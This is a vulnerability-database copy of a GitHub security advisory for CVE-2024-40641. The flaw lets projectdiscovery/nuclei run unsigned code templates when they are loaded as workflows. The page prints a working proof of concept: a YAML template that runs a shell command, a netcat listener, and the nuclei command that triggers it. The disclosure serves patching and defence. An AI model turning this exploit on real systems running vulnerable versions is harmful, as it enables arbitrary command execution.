GHSA-C3Q9-C27P-CW9H

Vulnerability from github – Published: 2024-07-17 19:32 – Updated: 2024-08-20 14:57
VLAI?
Summary
projectdiscovery/nuclei allows unsigned code template execution through workflows
Details

Summary

Find a way to execute code template without -code option and signature.

Details

write a code.yaml:

id: code

info:
  name: example code template
  author: ovi3


code:
  - engine:
      - sh
      - bash
    source: |
      id

http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}

        {{code_response}}

workflows:
  - matchers:
    - name: t

using nc to listen on 80:

nc -lvvnp 80

execute PoC template with nuclei:

./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug

and nc will get id command output.

We use -w to specify a workflow file, not -t to template file. and notice there is a workflows field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

Impact

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

Severity ?
7.4 (High)
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
8.8 (High)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/projectdiscovery/nuclei/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-40641"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-17T19:32:23Z",
    "nvd_published_at": "2024-07-17T18:15:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nFind a way to execute code template without -code option and signature.\n\n### Details\nwrite a `code.yaml`:\n```yaml\nid: code\n\ninfo:\n  name: example code template\n  author: ovi3\n\n\ncode:\n  - engine:\n      - sh\n      - bash\n    source: |\n      id\n\nhttp:\n  - raw:\n      - |\n        POST /re HTTP/1.1\n        Host: {{Hostname}}\n\n        {{code_response}}\n\nworkflows:\n  - matchers:\n    - name: t\n```\n\nusing nc to listen on 80:\n```bash\nnc -lvvnp 80\n```\n\nexecute PoC template with nuclei:\n```bash\n./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug\n```\nand nc will get `id` command output.\n\nWe use `-w` to specify a workflow file, not `-t` to template file. and notice there is a `workflows` field in code.yaml to pretend to be a workflow file.\n\nTest in Linux and Nuclei v3.2.9\n\n### Impact\nSome web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)\n",
  "id": "GHSA-c3q9-c27p-cw9h",
  "modified": "2024-08-20T14:57:15Z",
  "published": "2024-07-17T19:32:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-c3q9-c27p-cw9h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40641"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/projectdiscovery/nuclei"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "projectdiscovery/nuclei allows unsigned code template execution through workflows"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.